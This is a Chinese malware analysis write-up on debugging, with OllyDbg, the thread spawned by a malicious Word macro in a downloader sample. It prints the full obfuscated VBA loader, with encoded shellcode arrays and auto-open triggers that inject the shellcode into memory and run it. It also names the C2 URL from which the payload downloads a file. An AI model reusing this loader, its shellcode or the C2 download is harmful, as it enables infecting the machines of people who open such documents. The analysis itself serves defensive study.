OD 调试宏代码中的新线程
作者:Yenn_
donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588
基本信息
| File Name | File Size | File Type | MD5 |
|---|---|---|---|
| fees_10_to_12-copy.doc | 46,119 Bytes | Downloader | 7a6559ff13f2aecd89c64c1704a68588 |
样本是一个带有宏代码的.doc文档,文档内无诱饵内容,代码部分被加密
样本分析
donot - fees_10_to_12-copy.doc
将宏代码提取后:
#If VBA7 Then Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If
Sub iIljILiiJILLlljL()
Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
#If VBA7 Then
Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
#Else
Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
#End If
jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
#If Win64 Then
IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
#Else
IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
#End If
iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
Next JlLiLJjLjiJlllIi
lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0);创建新线程
End Sub
Sub AutooPEN()
iIljILiiJILLlljL
End Sub
Sub WOrkBook_OPen()
iIljILiiJILLlljL
End Sub
通过阅读宏代码,得知样本的大意为硬编码的数据,解密出一段Shellcode并在自身中创建新线程执行。
在创建线程的地方下断,“iIJIllLIliILJIll”为新线程函数地址,通过调试得到这次的内存地址为”322371584”,转为HEX为”1337 0000”
通过阅读宏代码,得知样本的大意为硬编码的数据,解密出一段Shellcode并在自身中创建新线程执行。
在创建线程的地方下断,“iIJIllLIliILJIll”为新线程函数地址,通过调试得到这次的内存地址为”322371584”,转为HEX为”1337 0000”。
这里创建新线程后,代码进入了新线程内,Office内的调试器不能调试,OD忽略所有异常然后附加进程”WINWORD.exe”,跳转前面的函数地址,来到写入的Shellcode地址,修改EIP到代码起始位置,开始调试。
New Thread
解密算法:
解密获取到VirtualAlloc的地址并调用,申请一块内存,通过硬编码写入数据,再次解密出需要使用的函数地址。
尝试从C2地址下载文件”http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico"
截至分析时,下载的文件已失效
以上是 OD 调试宏代码中的新线程 的全部内容, 来源链接: utcz.com/p/199878.html
